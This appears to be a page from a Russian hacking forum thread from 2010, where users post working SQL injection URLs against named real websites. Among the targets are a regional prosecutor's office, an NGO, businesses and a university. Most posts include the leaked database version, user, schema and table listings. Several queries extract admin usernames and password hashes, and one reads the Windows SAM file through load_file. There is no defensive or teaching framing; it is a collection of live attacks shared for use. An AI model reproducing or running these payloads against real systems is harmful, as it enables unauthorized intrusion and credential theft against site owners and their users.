ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12051  
Старый 05.05.2010, 13:46
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

А ВОТ ПРОКУРАТУРА КУРСКОЙ ОБЛАСТИ...

Код:
http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),5,6+--
version : 5.0.16-standard-log
user : prosecutor@ns.kursktelecom.ru
database : ProsecutoryDB
os : pc-linux-gnu
Код:
http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_encrypt(group_concat(login,0x3a,hash+SEPARATOR+0x0b),0x71),0x71),5,6+from+auth--
 
Ответить с цитированием

  #12052  
Старый 05.05.2010, 16:45
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.basw-ngo-by.net/page.php?issue_id=-292+union+select+1,2,3,4--

user(): BASWNGOBYNET@LOCALHOST
version(): 5.0.51A-24+LENNY1-LOG
database(): BASWNGOBYNET
OS: DEBIAN-LINUX-GNU
 
Ответить с цитированием

  #12053  
Старый 05.05.2010, 17:11
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.laktomir-nsk.ru
ТИЦ: 10
PR: 1
Пример запроса:
Код:
http://www.laktomir-nsk.ru/index3.php?id=-23+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_laktomir
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
cute_categories,   
cute_comments,   
cute_flood,   
cute_ipban,   
cute_news,   
cute_story,   
cute_users,   
categg,   
email,   
files,   
kapital_zed_admin_menu,   
kapital_zed_articles,   
kapital_zed_brotator,   
kapital_zed_category,   
kapital_zed_form,   
kapital_zed_news,   
kapital_zed_pages,   
kapital_zed_redirect,   
kapital_zed_site_menu,   
kapital_zed_siteinfo,   
kapital_zed_tplblock,   
kapital_zed_tplmanager,   
kapital_zed_users,   
tovari,   
zed_news,   
zed_news2,   
cute_categories,   
cute_comments,   
cute_flood,   
cute_ipban,   
cute_news,   
cute_story,   
cute_users,   
files,   
kapital_zed_admin_menu,   
kapital_zed_articles,   
kapital_zed_brotator,   
kapital_zed_category,   
kapital_zed_form,   
kapital_zed_news,   
kapital_zed_pages,   
kapital_zed_redirect,   
kapital_zed_site_menu,   
kapital_zed_siteinfo,   
kapital_zed_tplblock,   
kapital_zed_tplman
columns:

Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
QUERY_ID,   
SEQ,   
STATE,   
DURATION,   
CPU_USER,   
CPU_SYSTEM,   
CONTEXT_VOLUNTARY,   
CONTEXT_INVOLUNTARY,   
BLOCK_OPS_IN,   
BLOCK_OPS_OUT,   
MESSAGES_SENT,   
MESSAGES_RECEIVED,   
PAGE_FAULTS_MAJOR,   
PAGE_FAULTS_MINOR,   
SWAPS,   SOURCE_FUNCTION,   
SOURCE_FILE,   
SO
=========================================
Сайт: http://www.spectehsnab.ru
ТИЦ: 0
PR: 2
Пример запроса:
Код:
http://www.spectehsnab.ru/index3.php?id=251+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.0.38-Ubuntu_ubuntu-log
user - apache@localhost
database - spectehsnab
os - pc-linux-gnu

=========================================

Сайт: http://www.tectoria.co.jp
ТИЦ: 0
PR:
Пример запроса:
Код:
http://www.tectoria.co.jp/products/index3.php?id=1'+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--&cnt=
version - PostgreSQL 7.3.15 on i686-pc-linux-gnu, compiled by GCC 2.96
user - s06010103
database - products_DB
os - pc-linux-gnu
 
Ответить с цитированием

  #12054  
Старый 05.05.2010, 18:55
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

MySQL 4.1.14-nt
серв на винде
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_c oncat(0x3a,user,0x3a,password,0x3a,file_priv))),11 ,12+from+mysql.user+--
резалт

Цитата:
:root:*0га:Y
лоадим файл SAM
Цитата:
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,hex(load_file(0x6 33a2f77696e646f77732f7265706169722f73616d)),11,12+ from+mysql.user+--
в hex
 
Ответить с цитированием

  #12055  
Старый 05.05.2010, 19:12
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.wbstraining.com/php/events/showevent.php?id=-157+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+from+infor mation_schema.tables
 
Ответить с цитированием

  #12056  
Старый 05.05.2010, 21:23
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.cosmicus.nl
ТИЦ: 10
PR: 5
Пример запроса:
Код:
http://www.cosmicus.nl/site/index3.php?id=-186+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables--+
version - 5.0.24a-standard
database - cmcuser@localhost
user - cosmicus
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
11_afdeling,   
11_bestuur,   
11_bestuur_controle,   
22_cms,   
23_cms_page,   
24_projecten,   
4images_categories,   
4images_comments,   
4images_groupaccess,   
4images_groupmatch,   
4images_groups,   
4images_images,   
4images_images_temp,   
4images_lightboxes,   
4images_postcards,   
4images_sessions,   
4images_sessionvars,   
4images_settings,   
4images_users,   
4images_wordlist,   
4images_wordmatch,   
99_cms,   
advertenties,   
afdeling,   
agenda,   
agenda_type,   
ap_poll,   
ap_settings,   
ap_theme,   
ap_users,   
ap_votes,   
artikels,   
auteurs,   
bestuur,   
bestuur_edit,   
blad,   
cmc_banner,   
cmc_bannerclient,   
cmc_bannerfinish,   
cmc_categories,   
cmc_components,   
cmc_contact_details,   
cmc_content,   
cmc_content_frontpage,   
cmc_content_rating,   
cmc_core_acl_aro,   
cmc_core_acl_aro_groups,   
cmc_core_acl_aro_sections,   
cmc_core_acl_groups_aro_map,   
cmc_core_l
columns:

Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
SPECIFIC_NAME,   
ROUTINE_CATALOG,   
ROUTINE_SCHEMA,   
ROUTINE_NAME,   
ROUTINE_TYPE,   
DTD_IDENTIFIER,   
ROUTINE_BODY,   
ROUTINE_DEFINITION,   
EXTERNAL_NAME,   
EXTERNAL_LANGUAGE,   
PARAMETER_STYLE,   
IS_DETERMINISTIC,   
SQL_DATA_ACCESS,   
SQL_PATH,   
SECURITY_TYP
==================================

Сайт: http://www.film.ua
ТИЦ: 50
PR: 4
Примеры запросов:
Код:
http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+    
http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+union+select+1,2--+
Нужна рега ^^
version - 5.0.84-log
user - film2@localhost
database - film2
os - pc-linux-gnu

Последний раз редактировалось aka_zver; 05.05.2010 в 21:26..
 
Ответить с цитированием

  #12057  
Старый 05.05.2010, 21:26
Аватар для av1
av1
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997

Репутация: 66
Отправить сообщение для av1 с помощью ICQ
По умолчанию

Код:
http://www.zideo.nl/index.php?option=com_content&id=-142+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
User: root@localhost
Version: 5.0.51a-community-nt-log
Database: admin_zideo

Google PR: 5

Какойто касяк с админкой!
 
Ответить с цитированием

  #12058  
Старый 05.05.2010, 22:28
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

прямо к админу

http://dyadem.it/media/pr.php?id=-34+union+select+1,2,3,4,concat(username,char(58),p assword)+from+calendar.users+limit+0,1--
 
Ответить с цитированием

  #12059  
Старый 05.05.2010, 22:36
Аватар для Iron47
Iron47
Познающий
Регистрация: 23.05.2009
Сообщений: 42
Провел на форуме:
455732

Репутация: 8
По умолчанию

Код:
http://www.ruslana.ua/en/press.php?ln=2&pr=1+and+1=0+union+select+concat%280x5b,0x4d,0x61, 0x63,0x68,0x69,0x6e,0x65,0x3a,0x20,@@version_compi le_machine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b ,0x4f,0x53,0x20,0x3a,0x20,@@version_compile_os,0x2 0,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x4 2,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3a,0x2 0,0x20,@@version,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x2 0,0x5b,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x2 0,0x43,0x6f,0x6d,0x6d,0x65,0x6e,0x74,0x3a,0x20,@@v ersion_comment,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20, 0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x55, 0x73,0x65,0x72,0x3a,0x20,system_user%28%29,0x20,0x 5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x48,0x6f,0x 73,0x74,0x6e,0x61,0x6d,0x65,0x3a,0x20,@@hostname,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0 x61,0x74,0x61,0x44,0x69,0x72,0x3a,0x20,@@datadir,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x42,0 x61,0x73,0x65,0x64,0x69,0x72,0x3a,0x20,@@basedir,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x74,0 x6d,0x70,0x20,0x44,0x69,0x72,0x3a,0x20,@@tmpdir,0x 20,0x5d,0x20,0x2d2d,0x2d,0x20,0x5b,0x20,0x44,0x61, 0x74,0x61,0x62,0x61,0x73,0x65,0x3a,0x20,database%2 8%29,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20, 0x53,0x74,0x6f,0x72,0x61,0x67,0x65,0x20,0x45,0x6e, 0x67,0x69,0x6e,0x65,0x3a,0x20,@@storage_engine,0x2 0,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x5 1,0x4c,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x7 3,0x3a,0x20,@@sql_warnings,0x20,0x5d,0x20,0x2d,0x2 d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x72,0x76,0x65,0x7 2,0x20,0x49,0x44,0x3a,0x20,@@server_id,0x20,0x5d,0 x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x69,0x63,0 x65,0x6e,0x73,0x65,0x3a,0x20,@@license,0x20,0x5d,0 x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x63,0 x75,0x72,0x65,0x20,0x41,0x75,0x74,0x68,0x3a,0x20,@ @secure_auth,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x 5b,0x20,0x45,0x78,0x70,0x69,0x72,0x65,0x20,0x4c,0x 6f,0x67,0x73,0x20,0x44,0x61,0x79,0x73,0x3a,0x20,@@ expire_logs_days,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x2 0,0x5b,0x20,0x4c,0x6f,0x67,0x20,0x57,0x61,0x72,0x6 e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@log_warnings,0x2 0,0x5d,0x20,0x20,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x2 0,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x54,0x69,0x6 d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@system _time_zone,0x5d,0x20,0x2d,0x2d,0x2d,0x2d,0x2d,0x20 ,0x5b,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e ,0x65,0x3a,0x20,@@time_zone,0x20,0x5d%29--

[Machine: i386 ] --- [OS : portbld-freebsd6.3 ] --- [ DB Version: 5.0.90 ] --- [ Version Comment: FreeBSD port: mysql-server-5.0.90 ] --- [ System User: root@localhost ] --- [ Hostname: ruslana.ua ] --- [ DataDir: /var/db/mysql/ ] --- [ Basedir: /usr/local/ ] --- [ tmp Dir: /var/tmp/ ] --- [ Database: ruslana ] --- [ Storage Engine: MyISAM ] --- [ SQL Warnings: 0 ] --- [ Server ID: 1 ] --- [ License: GPL ] --- [ Secure Auth: 0 ] --- [ Expire Logs Days: 0 ] --- [ Log Warnings: 1 ] --- [ System Time Zone: UTC] ----- [ Time Zone: SYSTEM ]

Последний раз редактировалось Iron47; 05.05.2010 в 22:41..
 
Ответить с цитированием

  #12060  
Старый 05.05.2010, 22:39
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.bcspeakers.com/product.php?id=-0000000046+union+select+1,2,3,4,5,6,concat(usernam e,char(58),password),8,9,10,11,12,13,14,15+from+_u ser--

http://www.estaciontierra.com/artistas/artista.php?id=-164+union+select+1,2,3,4,5,user(),7,8,9,@@version_ compile_os,11,database(),version(),14--

http://www.webjournal.unior.it/Articoli.php?IdVolume=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( name,char(58),password)+from+admin--

Последний раз редактировалось Konqi; 05.05.2010 в 23:30..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ